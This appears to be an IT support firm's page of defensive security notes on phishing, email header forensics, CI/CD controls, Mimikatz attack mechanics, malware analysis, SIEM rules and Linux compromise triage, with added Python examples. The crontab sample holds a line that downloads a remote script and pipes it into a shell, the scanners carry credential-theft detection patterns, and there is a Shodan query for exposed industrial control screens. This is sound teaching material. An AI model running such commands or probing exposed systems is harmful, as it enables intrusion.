Our Vision

To give customers the most compelling IT Support experience possible.

Our Mission

Our mission is simple: make technology an asset for your business not a problem.

Our Values

We strive to make technology integrate seamlessly with your business so your business can grow. As your technology partner, we grow when your business grows, so we work hand in hand with you to support that growth.

Our Values

We develop relationships that make a positive difference in our customers' business.

Our Values

We exhibit a strong will to win in the marketplace and in every aspect of our business.

Social Engineering Red Flags and Email Investigation

Social Engineering - a single individual or a group of people attempting to gain access to your systems by using the methods below.

It relies on interaction with humans, who are tricked into handing over credentials. Humans are the weakest link, so attackers rely on deceptive techniques to break in.

Types of Social Engineering Attacks:

  • Phishing - a malicious email that sends the victim a link
  • Spear-phishing - phishing that targets specific individuals or groups
  • Email spoofing - masquerading as someone else, so the message appears to come from someone you think you know
  • Baiting - enticing the victim to do something, e.g. leaving a USB stick lying around
  • Tailgating - gaining access by following an employee through a door or gate


Indicators or Red Flags to look for during investigation:


Email spear phishing: In this email fraud the perpetrator asks for confidential and sensitive information. This type of attack resembles email spoofing fraud, but here in almost all cases the sender appears to be someone trustworthy with an authoritative position in the organization.

Business email compromise is when criminals use email to abuse trust in business processes to scam organizations out of money or goods.


An email forensic investigator can use several header fields to trace an email; broadly, the areas of interest the investigator should look into are:

  • The sender's SMTP server (outgoing mail server)
  • The encrypted mail header
  • The typical To, From, Subject and Date lines
  • Mail transfer and email client information
  • The various X-headers added by different SMTP servers and email clients during the sending process
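The header areas listed above, worked through in code as an added example (not part of the original page): it reconstructs the delivery path from the Received: headers, compares the visible From: domain with the envelope Return-Path:, and collects the X-headers. The message, hosts, addresses and IPs are constructed for the demo.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample message. MTAs prepend Received: headers, so the newest
# hop is on top; the hosts, addresses and IPs here are made up for the demo.
RAW_EMAIL = """\
Return-Path: <billing@mail-example.invalid>
Received: from relay.corp.example (relay.corp.example [203.0.113.10])
\tby mx.corp.example with ESMTP id abc123; Mon, 1 Mar 2021 09:15:02 +0000
Received: from mail-example.invalid (unknown [198.51.100.7])
\tby relay.corp.example with SMTP; Mon, 1 Mar 2021 09:14:58 +0000
X-Mailer: BulkSender 2.1
From: "CEO" <ceo@corp.example>
To: finance@corp.example
Subject: Urgent wire transfer
Date: Mon, 1 Mar 2021 09:14:50 +0000

Please process the attached invoice today.
"""

# "from <host> ... by <host>" is the part of a Received: header that records
# one hop; the "with", "id" and date clauses are ignored here.
RECEIVED_RE = re.compile(r"\bfrom\s+(?P<src>\S+).*?\bby\s+(?P<dst>\S+)", re.S)


def received_chain(raw):
    """Return the (sending host, receiving host) hops in delivery order."""
    msg = message_from_string(raw)
    hops = []
    for hdr in msg.get_all("Received", []):
        m = RECEIVED_RE.search(hdr.replace("\n", " "))
        if m:
            hops.append((m.group("src"), m.group("dst")))
    return list(reversed(hops))       # top header = last hop, so reverse


def header_summary(raw):
    """Pull out the fields an investigator compares: the visible From:
    domain, the envelope Return-Path: domain, and any X-* headers."""
    msg = message_from_string(raw)
    from_addr = parseaddr(msg.get("From", ""))[1]
    return_path = parseaddr(msg.get("Return-Path", ""))[1]
    return {
        "from_domain": from_addr.rpartition("@")[2].lower(),
        "return_path_domain": return_path.rpartition("@")[2].lower(),
        "x_headers": {k: v for k, v in msg.items() if k.lower().startswith("x-")},
    }


def red_flags(raw):
    """Red flags: the envelope sender does not match the visible sender, or
    the first hop did not originate from the claimed sender's domain."""
    info = header_summary(raw)
    hops = received_chain(raw)
    flags = []
    if info["from_domain"] != info["return_path_domain"]:
        flags.append("From/Return-Path domain mismatch")
    if hops and not hops[0][0].endswith(info["from_domain"]):
        flags.append("first hop %s is not a %s host" % (hops[0][0], info["from_domain"]))
    return flags


if __name__ == "__main__":
    for hop in received_chain(RAW_EMAIL):
        print("%s -> %s" % hop)
    print(header_summary(RAW_EMAIL))
    print(red_flags(RAW_EMAIL))
```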

 

CI/CD Pipelines and Automation

Modern web applications are built using continuous integration and deployment processes. This means that you run tests specific to whatever environment you are pushing to, whether that is DEV, STAGING or PROD.

Control 3.1 - CI/CD Pipeline (Priority 1, Difficulty: Medium)
Description: Implement a CI/CD pipeline.

Control 3.2 - Application Environments (Priority 2, Difficulty: Medium)
Description: Create separate environments for dev, staging and prod, and treat each as independent with its own data, testing and requirements.

Control 3.3 - Application Data Separation (Priority 3, Difficulty: Difficult)
Description: Make sure that dev and test environments are not using the same data as production. If the use of live data is required, then make sure that data is anonymized.

Control 3.4 - CI/CD Administration (Priority 3, Difficulty: Medium)
Description: Create and enforce user or team roles so that only the appropriate people can change or disable tests and deployment requirements.

Control 3.5 - Credential Store (Priority 1, Difficulty: Medium)
Description: Create a secure, encrypted place to store sensitive credentials like passwords, API keys, etc.

Control 3.6 - Centralized Software Composition Analysis (Priority 1, Difficulty: Easy)
Description: Scan source code for vulnerable libraries and open source software from within a CD stage.

Control 3.7 - Centralized Static Code Analysis (Priority 2, Difficulty: Easy)
Description: Scan source code for vulnerabilities in the source code itself from within a CD stage.

Control 3.8 - Centralized Sensitive Data Analysis (Priority 2, Difficulty: Easy)
Description: Scan source code for secrets, credentials, API keys and similar from within a CD stage.

Control 3.9 - Dynamic Application Security Testing (DAST) (Priority 3)
Description: Scan the running application for vulnerabilities.
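Control 3.8 as a pipeline stage, added here as an illustration rather than anything from the page: a scanner that fails the deployment when the source tree contains credentials, with app.py showing the corrected form that reads the password from the environment (which the credential store of control 3.5 would populate). The patterns, file names and contents are constructed.

```python
import re
from dataclasses import dataclass

# Detection patterns (mine, not the page's). The AKIA prefix and the PEM
# marker are public formats; the last rule catches a string literal assigned
# to a name that looks like a password or API key. Extend for your code base.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "hardcoded_secret": re.compile(
        r"(?i)(password|passwd|secret|api[_-]?key)\s*[:=]\s*['\"][^'\"]{8,}['\"]"),
}


@dataclass
class Finding:
    path: str
    line_no: int
    kind: str


def scan_text(path, text):
    """Return a Finding for every line of `text` that matches a pattern."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for kind, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                findings.append(Finding(path, line_no, kind))
    return findings


def scan_repo(files):
    """`files` maps a path to its content; in a real stage this is read from
    the checked-out tree."""
    findings = []
    for path in sorted(files):
        findings.extend(scan_text(path, files[path]))
    return findings


def pipeline_gate(files):
    """The CD stage: True means the deployment may continue, False means fail
    the build and surface the findings."""
    findings = scan_repo(files)
    return len(findings) == 0, findings


# Constructed repository. AKIAIOSFODNN7EXAMPLE is the documented AWS example
# key id, not a real credential; the PEM body is a placeholder.
SAMPLE_REPO = {
    "config.py": 'DB_PASSWORD = "hunter2hunter2"\nDEBUG = False\n',
    "deploy.sh": "#!/bin/sh\nexport AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE\n",
    "key.pem": "-----BEGIN RSA PRIVATE KEY-----\n<constructed key body>\n",
    "app.py": 'import os\npassword = os.environ["DB_PASSWORD"]\n',  # corrected form
}

if __name__ == "__main__":
    ok, findings = pipeline_gate(SAMPLE_REPO)
    for f in findings:
        print("%s:%d %s" % (f.path, f.line_no, f.kind))
    print("gate:", "PASS" if ok else "FAIL")
```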

Azure Well Architected Security Review Checklist

Here we have compiled a checklist for Azure security.

Priority: High Weight: 90

Item No 1: Classify your data at rest and use encryption
Item No 2: Implement Conditional Access Policies

Priority: High Weight: 70
Item No 3: Conduct periodic access reviews for the workload
Item No 4: Use only secure hash algorithms (SHA-2 family)
Item No 5: Discover and remediate common risks to improve Secure Score in Azure Security Center
Item No 6: Define a set of Azure Policies which enforce organizational standards and are aligned with the governance team
Item No 7: Use tools like Azure Disk Encryption, BitLocker or DM-Crypt to encrypt virtual disks
Item No 8: Deprecate legacy network security controls
Item No 9: Integrate network logs into a Security Information and Event Management (SIEM)
Item No 10: Data in transit should be encrypted at all points to ensure data integrity
Item No 11: Establish a designated group responsible for central network management
Item No 12: Build a security containment strategy
Item No 13: Evolve security beyond network controls
Item No 14: Periodically perform external and/or internal workload security audits
Item No 15: Establish lifecycle management policy for critical accounts
Item No 16: Standardize on modern authentication protocols

Priority: Medium Weight: 60
Item No 17: Configure web apps to reuse authentication tokens securely and handle them like other credentials
Item No 18: Ensure security team has Security Reader or equivalent to support all cloud resources in their purview
Item No 19: Synchronize on-premises directory with Azure AD
Item No 20: Implement identity-based storage access controls
Item No 21: Design virtual networks for growth
Item No 22: Use standard and recommended encryption algorithms
Item No 23: Assign permissions based on management or resource groups
Item No 24: Add planning, testing, and validation rigor to the use of the root management group

Priority: Medium Weight: 50

Item No 25: Use managed identity providers to authenticate to this workload
Item No 26: Enforce password-less or Multi-factor Authentication (MFA)
Item No 27: Continuously assess and monitor compliance
Item No 28: Use identity services instead of cryptographic keys when available
Item No 29: Establish a designated point of contact to receive Azure incident notifications from Microsoft
Item No 30: Establish process and tools to manage privileged access with just-in-time capabilities
Item No 31: Implement role-based access control for application infrastructure

Priority: Medium Weight: 40
Item No 32: Implement resource locks to protect critical infrastructure.


Mimikatz

What is Mimikatz?

If you're into penetration testing and Windows red teaming, you have probably heard of Mimikatz; in case you're wondering, or have heard of the tool but don't know what it does, let's see what Mimikatz is.

Written in C, Mimikatz is a very powerful post-exploitation tool, described by CrowdStrike's CTO and co-founder as "the AK-47 of cyber attacks."

Some even call Mimikatz the Swiss Army knife of Windows credentials. Benjamin Delpy, the developer of the tool, says he created it to play with Windows security. He maintains his own GitHub repository where he provides the source code for the tool and updates it regularly.

What can be done using Mimikatz?

Although widely known for credential dumping, that is not the only thing it can do.

Mimikatz is also capable of assisting in lateral movement and privilege escalation. Attacks like Pass-the-Hash, Pass-the-Ticket, Over-Pass-the-Hash, Kerberoasting, etc. can also be performed with Mimikatz.

Mimikatz Attack Capabilities

Mimikatz has numerous modules that let attackers perform a variety of tasks on the target endpoint. Some of the more important attacks facilitated by the tool are:

  • Pass-the-Hash - obtains an NTLM hash, the form in which Windows represents passwords. This allows attackers to reuse the password without having to crack the hash.

  • Pass-the-Ticket - Mimikatz was famously used to break the Kerberos protocol. It can obtain a Kerberos "ticket" for a user account and use it to log in as that user on another computer.

  • Kerberos Golden Ticket - obtains the ticket for the hidden root account (KRBTGT) that encrypts all authentication tickets, granting domain admin access on any computer in the network.

  • Kerberos Silver Ticket - exploits Windows functionality that grants a user a ticket to access multiple services on the network (via the Ticket Granting Server, or TGS). The Kerberos protocol may not check the TGS key, allowing attackers to reuse the key and impersonate the user on the network.

  • Pass the Key - obtains a unique key used by a user to authenticate to a domain controller. The attacker can reuse this key to impersonate the user.

Anatomy of a Mimikatz Attack:

Mimikatz abuses the single sign-on functionality of Windows authentication, which allows a user to authenticate only once in order to use various Windows services.

After a user logs into Windows, a set of credentials is generated and stored in memory by the Local Security Authority Subsystem Service (LSASS). Because LSASS is loaded in memory, Mimikatz, when invoked, loads its dynamic link library (DLL) into the LSASS process, from where it can extract the credential hashes and dump them onto the attacking system; it may even yield cleartext passwords.

Malware Analysis, Tools and Techniques

What is Malware Analysis?
Malware analysis is the process of analyzing samples of malware families such as Trojans, viruses, rootkits, ransomware and spyware in an isolated environment to understand the infection, its type, purpose and functionality, applying various methods based on the sample's behavior in order to understand the motivation behind it and to apply the appropriate mitigation by creating rules and signatures that protect users.

Malware analysis plays an essential role in avoiding and understanding cyber attacks. When incident response teams are brought into an incident involving malware, the team will typically gather and analyze one or more samples in order to better understand the attacker's capabilities and to help guide their investigation.
 
Types of Malware:

Type               What It Does                                                  Real-World Example
Ransomware         disables the victim's access to data until a ransom is paid   RYUK
Fileless Malware   makes changes to files that are native to the OS              Astaroth
Spyware            collects user activity data without their knowledge           DarkHotel
Adware             serves unwanted advertisements                                Fireball
Trojans            disguise themselves as desirable code                         Emotet
Worms              spread through a network by replicating themselves            Stuxnet
Rootkits           give hackers remote control of a victim's device              Zacinlo
Keyloggers         monitor users' keystrokes                                     Olympic Vision
Bots               launch a broad flood of attacks                               Echobot
Mobile Malware     infects mobile devices                                        Triada

 
How to Perform Malware Analysis
There are various types of analysis, and related malware analysis tools, that are mainly used to break down malware:
  • Static Malware Analysis
  • Dynamic Malware Analysis
  • Memory Forensics
  • Web Domain Analysis
  • Network Interaction Analysis, etc.
Static Malware Analysis
This procedure includes extracting and examining the binary components and static behavioral indicators of an executable, for example API headers, referenced DLLs, PE sections and similar resources, without executing the sample.
Any deviation from the normal outcome is recorded in the static analysis results and a verdict given accordingly. Static analysis is done without executing the malware, whereas dynamic analysis is carried out by executing the malware in a controlled environment.
 
1. Disassembly – Programs can be ported to new computer platforms by compiling the source code in a different environment.

2. File Fingerprinting – Network data loss prevention solutions for identifying and tracking data across a network.

3. Virus Scanning – Virus scanning tools and instructions for malware and virus removal: remove malware, viruses, spyware and other threats. Examples: VirusTotal, Payload Security.

4. Analyzing memory artifacts – While analyzing memory artifacts such as a RAM dump, pagefile.sys and hiberfil.sys, the examiner can begin identifying rogue processes.

5. Packer Detection – Used to detect packers, cryptors, compilers, scramblers, joiners and installers.
Static Malware Analysis Tools
Ghidra and IDA: IDA Pro had been the go-to SRE (software reverse engineering) suite for many years until Ghidra's release in 2019. Since then Ghidra's popularity has grown exponentially due to it being a free, open-source tool that was developed, and is still maintained, by the NSA.

Websites: Hybrid Analysis, VirusTotal.com

Other tools: md5deep, PEiD, Exeinfo PE, RDG Packer Detector, de4dot, PEview, WinDbg, HxD
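The static steps above (file fingerprinting, inspecting the PE sections, packer detection) as an added example that is not from the original page or any of the tools named: it hashes a sample, walks the DOS, PE and section headers with the standard library only, and flags sections whose byte entropy suggests packing. The sample PE is a constructed, non-runnable stub, and the 7.0 entropy threshold is my assumption.

```python
import hashlib
import math
import struct


def fingerprint(data):
    """Hashes used to look the sample up (e.g. on VirusTotal) and to track it."""
    return {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}


def entropy(blob):
    """Shannon entropy in bits per byte: ~0 for padding, close to 8 for
    compressed or encrypted data, which is what packed sections look like."""
    if not blob:
        return 0.0
    counts = [0] * 256
    for b in blob:
        counts[b] += 1
    n = len(blob)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data):
    """Walk DOS header -> PE signature -> COFF header -> section table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    sec_table = e_lfanew + 24 + opt_size       # 4 (signature) + 20 (COFF) + optional header
    sections = []
    for i in range(nsec):
        name, vsize, _, raw_size, raw_ptr, *_ = struct.unpack_from("<8sIIIIIIHHI", data, sec_table + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "raw_size": raw_size,
                         "entropy": round(entropy(raw), 2)})
    return {"machine": hex(machine), "timestamp": stamp, "characteristics": hex(chars), "sections": sections}


def triage(data, packed_threshold=7.0):
    """Static triage: hashes, header facts and a packer heuristic (my
    assumption): a section whose raw bytes have entropy above the threshold."""
    report = fingerprint(data)
    report.update(parse_pe(data))
    report["likely_packed"] = [s["name"] for s in report["sections"] if s["entropy"] > packed_threshold]
    return report


# ---- constructed sample: a minimal, non-runnable PE with two sections ----
def _pseudo_random(n):
    out, seed = bytearray(), b"constructed-seed"     # deterministic, looks encrypted
    while len(out) < n:
        seed = hashlib.sha256(seed).digest()
        out += seed
    return bytes(out[:n])


def build_sample_pe():
    text = b"\x90" * 512                      # NOP padding: entropy 0
    packed = _pseudo_random(1024)             # what a packed section looks like
    hdr_len = 0x40 + 4 + 20 + 40 * 2          # DOS + signature + COFF + 2 section headers

    def section(name, size, ptr):             # IMAGE_SECTION_HEADER, 40 bytes
        return struct.pack("<8sIIIIIIHHI", name, size, 0x1000, size, ptr, 0, 0, 0, 0, 0x60000020)

    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew at 0x3C
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, 0, 0x0102)  # i386, 2 sections
    return (dos + b"PE\0\0" + coff + section(b".text", len(text), hdr_len)
            + section(b"UPX1", len(packed), hdr_len + len(text)) + text + packed)


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(key, value)
```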
What is Dynamic Malware Analysis?
Dynamic analysis should always be an analyst's first approach to discovering malware functionality. For dynamic analysis, you build a virtual machine that is used as the place to carry out the analysis.

In addition, the malware is analyzed using a malware sandbox, monitoring the malware's processes and analyzing the packet data it generates.
Dynamic analysis tools:
Some common dynamic analysis tools are Wireshark, Netcat, Procmon (Process Monitor), Process Explorer, Regshot, ApateDNS, ProcDOT, Process Hacker, PeStudio, Fiddler, Cuckoo Sandbox and Ghidra.
After you have gathered some data, it is time for analysis:

  • Upload the hash and/or file to a site such as VirusTotal, ANY.RUN or Hybrid Analysis to get information
  • If an IP or domain name is available, check databases of known adversaries
  • Use packet capture and traffic analysis if an external connection by the malware is suspected
  • Obtain the malicious file and analyze it in a sandbox to identify indicators
  • Use logs from the SIEM and EDR to identify other infected endpoints
  • Take the identified endpoint off the network; do not power it off
  • Use the data gathered to set up blocks against future attacks

SIEM Rules from Event Log IDs and Use Cases

Below is some guidance on rule creation and which events to look for:
Collection - Domain Controller - User Activity - Network Share Accessed
This rule looks for Windows Event ID 5140, which indicates that a network share has been accessed. On workstations or domain controllers, this event can be used to identify access to C$ or Admin$. Common false positives will be IPC$, \Sysvol and \Netlogon.
 
Credential Access - AD - Account Lockout - Service Account
Event ID 4740
 
Defense Evasion - Domain Controller - System Change - Event Logs Cleared
Identifies the deletion of event logs from a Windows host or domain controller. This may be performed to destroy evidence of malicious activity on a system.
Event ID 1102
 
Discovery - AD - Account Enumeration - Host
Event ID 4771, 4625,4768
 
Discovery - AD - Kerberoasting
This rule looks for activity on Active Directory indicative of Kerberoasting attacks. Kerberoasting is where an attacker cracks Kerberos service tickets and rewrites them in order to gain access to a targeted service.
Event ID 4769
 
Execution - Network - Access Attempt - Unicode Domain
Identifies web requests where the website domain contains Unicode characters. Unicode allows the display of foreign characters within the URL bar and can be used to attempt to trick users to go to malicious websites.
URL matches: *?xn--.*?   Log source: web proxy servers and firewalls
 
Exfiltration - Email - Auto Forwarding
This rule looks for many emails from a single internal user going to an external email address, indicative of a user forwarding their external mail content to a personal mailbox.
Vendor Msg id is : send , and status is: originating
 
Initial Access - ADFS - Excessive Login Failures
Identifies a large volume of ADFS failures, which may indicate account enumeration, brute-force login activity or a client misconfiguration.
Event ID 1201,1203,1205
 
Initial Access - Remote Access - Login Attempt - Different Geos
Identifies VPN login attempts by the same user across geographically distant locations in a short time period. This may indicate account compromise, especially if the user is not traveling.

 
Lateral Movement - Domain Controller - Login Attempt - Interactive
Identifies a remote interactive login to a domain controller.
Event ID 4624 and Logon Type is 10 or 2
 
Persistence - Domain Controller - System Change - Audit Policy Changed
Identifies system audit policy changes on Windows hosts. This represents a change to the type of security events logged by the system and may be a pre-attack activity to avoid detection.
Event ID 4719,4905,4912
 
Persistence - Domain Controller - System Change - Domain Policy Changed
Event ID 4739
 
Persistence - Domain Controller - System Change - Multiple Processes Created
Identifies a large number of processes being created in a short time on a monitored Windows host. An abnormal volume of abnormal processes may indicate the host has been compromised or is being misused.
Event ID 4688, unique values >= 10
 
Persistence - Domain Controller - System Change - Scheduled Task
Identifies the creation of new scheduled tasks as well as changes to existing tasks. The creation of new scheduled tasks or the removal of existing ones may be a technique to maintain persistence.
Event ID:4698,4699,4700,4701,4702
 
Persistence - Domain Controller - System Change - Service Installed
Identifies the installation of unexpected services on a system. The installation of unexpected services may be an indicator of system compromise or misuse.
Event ID: 7045,4697,601
 
Privilege Escalation - AD - Group Change - Admin
Identifies attempts to change a user's group membership in AD. The high risk associated with delegating certain permissions in AD warrants a high level of scrutiny. For example, the promotion of a domain user to domain admin.
Event ID: 4728,4732,4746,4751,4756,4761
 
Privilege Escalation - ATP - Golden Ticket
This rule looks for Golden Ticket related activity identified by Azure ATP. See here for more details: https://docs.microsoft.com/en-us/azure-advanced-threat-protection/suspicious-activity-guide?tabs=external.
Event ID 2009,2013,2027,2032,2022
 
Hunting the Fileless Malware & Powershell Activities:
Event IDs (4104, 4103, and 4688)
 
  • Event ID 4103 – Module logging – attackers use several obfuscated commands and call self-defined variables and system commands. Hunting this event ID lets SOC operations record all the obfuscated commands as pipeline execution details under event ID 4103. It should be enabled in order to process and capture the malicious commands.
  • Event ID 4104 – PowerShell script block logging – captures the entire scripts that are executed, including by remote machines, for example obfuscated scripts that are decoded and executed at run time. This gives additional visibility on remote commands.
  • If an event exceeds the maximum event log message size, script block logging splits the logged events into multiple events, and suspicious commands can be observed at the logging level "Warning".

USE CASE: DNS Query
Objective: The mission of this hunt is to drill down into DNS logs to baseline the common domains queried by endpoints in the environment, as well as to identify potentially infected endpoints by looking for possible DNS tunneling, domain generation algorithm (DGA) domains, and traffic to risky top-level domains (TLDs).
Log Source & Requirements: DNS query logging
Duration: 30 Days
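Four of the rules above turned into detection logic over constructed events, as an added example that is not part of the original notes: the domain controller interactive logon (4624 with logon type 2 or 10), event log cleared (1102), multiple processes created (4688 with 10 or more unique values in a window) and the Unicode (xn--) domain rule. The DC hostname, the normalised field names, the five-minute window and the sample events are my assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import urlparse

DOMAIN_CONTROLLERS = {"DC01"}      # assumption: the asset list identifies DCs

# Constructed, normalised events. "source" is "winlog" for Windows security
# events and "proxy" for web-proxy lines; timestamps are ISO 8601.
EVENTS = [
    {"ts": "2021-03-01T09:00:00", "source": "winlog", "host": "DC01", "event_id": 4624, "logon_type": 10, "user": "svc_backup"},
    {"ts": "2021-03-01T09:00:05", "source": "winlog", "host": "WS07", "event_id": 4624, "logon_type": 10, "user": "alice"},
    {"ts": "2021-03-01T09:01:00", "source": "winlog", "host": "DC01", "event_id": 4624, "logon_type": 3, "user": "alice"},
    {"ts": "2021-03-01T09:02:00", "source": "winlog", "host": "DC01", "event_id": 1102, "user": "svc_backup"},
    {"ts": "2021-03-01T09:05:00", "source": "proxy", "host": "WS07", "url": "https://www.example.com/"},
    {"ts": "2021-03-01T09:05:30", "source": "proxy", "host": "WS07", "url": "https://login.xn--pple-43d.example/"},
]
# Twelve distinct processes on WS07 within one minute; three on DC01 spread over hours.
EVENTS += [{"ts": "2021-03-01T09:03:%02d" % i, "source": "winlog", "host": "WS07", "event_id": 4688,
            "process": "C:\\Temp\\tool%d.exe" % i} for i in range(12)]
EVENTS += [{"ts": "2021-03-01T%02d:00:00" % (10 + i), "source": "winlog", "host": "DC01", "event_id": 4688,
            "process": "C:\\Windows\\System32\\svc%d.exe" % i} for i in range(3)]


def _t(event):
    return datetime.fromisoformat(event["ts"])


def rule_dc_interactive_logon(events):
    """Lateral Movement: 4624 on a DC with logon type 2 (interactive) or 10 (remote interactive)."""
    return [e for e in events if e.get("event_id") == 4624
            and e["host"] in DOMAIN_CONTROLLERS and e.get("logon_type") in (2, 10)]


def rule_logs_cleared(events):
    """Defense Evasion: 1102, the security log was cleared."""
    return [e for e in events if e.get("event_id") == 1102]


def rule_process_burst(events, window=timedelta(minutes=5), threshold=10):
    """Persistence: at least `threshold` distinct 4688 process names on one host within `window`."""
    by_host = defaultdict(list)
    for e in events:
        if e.get("event_id") == 4688:
            by_host[e["host"]].append((_t(e), e["process"]))
    alerts = []
    for host, items in by_host.items():
        items.sort()
        for i, (start, _) in enumerate(items):       # slide the window over sorted events
            names = {p for t, p in items[i:] if t - start <= window}
            if len(names) >= threshold:
                alerts.append({"host": host, "start": start.isoformat(), "unique_processes": len(names)})
                break                                # one alert per host is enough
    return alerts


def rule_unicode_domain(events):
    """Execution: proxy requests whose hostname contains a punycode (xn--) label."""
    return [e for e in events if e.get("source") == "proxy"
            and "xn--" in (urlparse(e["url"]).hostname or "")]


def run_all(events):
    rules = {"dc_interactive_logon": rule_dc_interactive_logon, "logs_cleared": rule_logs_cleared,
             "process_burst": rule_process_burst, "unicode_domain": rule_unicode_domain}
    return {name: fn(events) for name, fn in rules.items()}


if __name__ == "__main__":
    for name, hits in run_all(EVENTS).items():
        print("%-22s %d hit(s)" % (name, len(hits)))
```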

Linux Compromises & Access Tools and Where to Find Them

Linux compromises

  • Linux systems are 'occasionally' targeted by actors, especially cryptomining and ransomware crews.
  • The process can be similar to Windows machine compromises, but some areas are specific to each flavour.
  • Below is a brief overview of the exploitation, protection, detection and remediation processes for Linux operating systems.

Exploitation:
    • Same process as Windows devices:
        • Exploit an external-facing service
        • Establish persistence
        • Collect credentials
        • Move laterally
Protection:
    • Similar to Windows:
        • Patch, including applications (e.g. a cron job running apt / yum update)
        • Limit the number of admins with sudo powers
        • Application whitelisting (fapolicyd)
    • ACSC also has a Linux hardening worksheet which could be useful (Hardening Linux Workstations and Servers)

Detection:
    • Utilising logs:
        • Web logs: exploitation attempts, webshells
        • Command-line logging
        • SSH logs
    • Memory images (which I don't think is a viable way for continuous detection, for incident response more likely)
        • Use YARA rules to search for malware; Volatility plugin

Process data:
    • ps -eaf
    • pstree

Get service (cron) data:
    • ls -la /etc/cron*
    • Cron jobs redirecting to "> /dev/null" are worth checking out
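A parser for the cron data gathered above, added as an example that is not from the original notes: it lists each job from a system crontab and flags the "> /dev/null" redirection the notes mention. The temp-directory and download-to-shell heuristics and the sample crontab are my additions.

```python
import re

# Constructed system crontab in /etc/cron.d format (schedule, user, command).
SAMPLE_CRONTAB = """\
# /etc/cron.d/backup (constructed sample)
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin
15 2 * * * root /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/5 * * * * root /tmp/.x/update >/dev/null 2>&1
@reboot www-data curl -s http://198.51.100.7/a.sh | sh > /dev/null 2>&1
"""

DEVNULL_RE = re.compile(r">\s*/dev/null")
TEMP_DIR_RE = re.compile(r"(^|\s|\|)(/tmp|/var/tmp|/dev/shm)/")
DOWNLOAD_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b")


def parse_crontab(text):
    """Return (schedule, user, command) for each job line; comments and
    environment assignments are skipped. Handles both "m h dom mon dow"
    schedules and the "@reboot"-style shortcuts."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        if line.startswith("@"):
            parts = line.split(None, 2)
        else:
            parts = line.split(None, 6)
            parts = [" ".join(parts[:5])] + parts[5:]
        if len(parts) == 3:
            jobs.append(tuple(parts))
    return jobs


def flag_job(command):
    """Heuristics. The /dev/null check is the one from the notes above; the
    temp-directory and download-to-shell checks are my additions."""
    flags = []
    if DEVNULL_RE.search(command):
        flags.append("output discarded to /dev/null")
    if TEMP_DIR_RE.search(command):
        flags.append("runs from a world-writable temp directory")
    if DOWNLOAD_TO_SHELL_RE.search(command):
        flags.append("pipes a download into a shell")
    return flags


def triage_crontab(text):
    return [{"schedule": s, "user": u, "command": c, "flags": flag_job(c)}
            for s, u, c in parse_crontab(text)]


if __name__ == "__main__":
    for job in triage_crontab(SAMPLE_CRONTAB):
        print("%-12s %-9s %s" % (job["schedule"], job["user"], job["command"]))
        for f in job["flags"]:
            print("    ! " + f)
```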
Remediation:
    • Change passwords
    • Regenerate keys (e.g. in SSH)
    • Remove added users
    • Clean off malware (webshells, scripts, implants)
    • Remove cron jobs
    • Monitor for reconnection attempts (from known malicious IPs)


Fantastic Access Tools
    • Attackers are increasingly using remote access tools to gain and maintain access to the network, through the utilisation of either:
        • Tools already deployed (and obtaining creds)
        • Deploying their own software

Generic detection to help find these tools in your org:
    • Event 4688 - process names
    • Event 4697 - service creation event (if the tool was installed as a service)
    • Sysmon - process names, DNS lookups / network traffic to known RMT domains
    • Firewall logs - connections classified as app
    • Can also manually check a host using:
        • wmic /node:<target> process list


Tool brief overviews
  • Recent report: Anomali, 'ScreenConnect Remote Access Tool Utilizing Ministry of Foreign Affairs-Themed EXEs and URLs'
    • DameWare
        • Requires an incoming connection from the internet on various ports
        • Connects to the IPv6 local host
        • Shodan.io - product:dameware
        • Dwrcs.exe
    • GoToAssist
        • Generates outgoing HTTP/S traffic - look for logmein or gotoassist
        • Gotoassist.exe
    • ConnectWise Control / ScreenConnect
        • Generates outgoing HTTP/S traffic
        • Screenconnect.clientservice.exe
        • Commonly used in phishing emails with a URL that deploys ScreenConnect directly
Guidance:
    • Keep an eye out for any remote management/access tools
    • Most of them will probably be "legit". If they are, ensure they:
        • Use MFA
        • Turn on logging
        • Manage the users
        • Turn off processes when not in use

------------------------------------------------------------------------------------------
SDBBot
  • SDBBot is a remote access trojan identified by Proofpoint in 2019. The ACSC issued an alert in November last year about increased sightings in attacks targeting healthcare. It's often used to drop ransomware.
  • Initial infection is usually via ISO or Excel email attachments. It sends C&C traffic over port 443 in a plaintext protocol. 


Prevention:
    • Microsoft's Attack Surface Reduction rules
    • Block ISO attachments and downloads 
    • Block non-HTTPS traffic over port 443


'Lo-Tech OT hacking'
  • A general primer on finding and securing 'human-machine interfaces', or HMIs - i.e. dashboards for SCADA/OT equipment.
  • Common exposed HMIs include HVACs, fridges, etc. 
  • Cool Shodan search: https://www.shodan.io/search?query=screenshot.label%3Aics
  • HMIs are easy to find and access. Targeted industrial sabotage is unlikely; most hackers are bored and poking at low-hanging fruit. 
